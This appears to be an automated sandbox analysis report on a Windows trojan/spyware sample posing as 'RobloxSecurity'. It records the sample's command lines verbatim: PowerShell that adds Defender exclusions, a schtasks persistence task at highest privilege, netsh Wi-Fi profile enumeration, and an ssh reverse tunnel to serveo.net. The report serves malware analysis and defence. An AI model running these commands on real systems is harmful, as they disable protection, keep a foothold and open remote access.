Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll

Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: vkefq4cv.oil.exe.0.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: vkefq4cv.oil.exe.4.dr, iYbhDf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: jqOHOuPMJP.exe, BootstrapLoader.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: jqOHOuPMJP.exe, BootstrapLoader.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@66/19@3/6

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Mutant created: \Sessions\1\BaseNamedObjects\jo0x2dte3z
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

File created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe

Jump to behavior

Source: jqOHOuPMJP.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: jqOHOuPMJP.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD747C000.00000004.00000800.00020000.00000000.sdmp

Source: jqOHOuPMJP.exe	ReversingLabs: Detection: 13%
Source: jqOHOuPMJP.exe	Virustotal: Detection: 24%

Source: unknown	Process created: C:\Users\user\Desktop\jqOHOuPMJP.exe C:\Users\user\Desktop\jqOHOuPMJP.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: jqOHOuPMJP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jqOHOuPMJP.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: jqOHOuPMJP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\system32\rsaenh.dll.pdb\| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
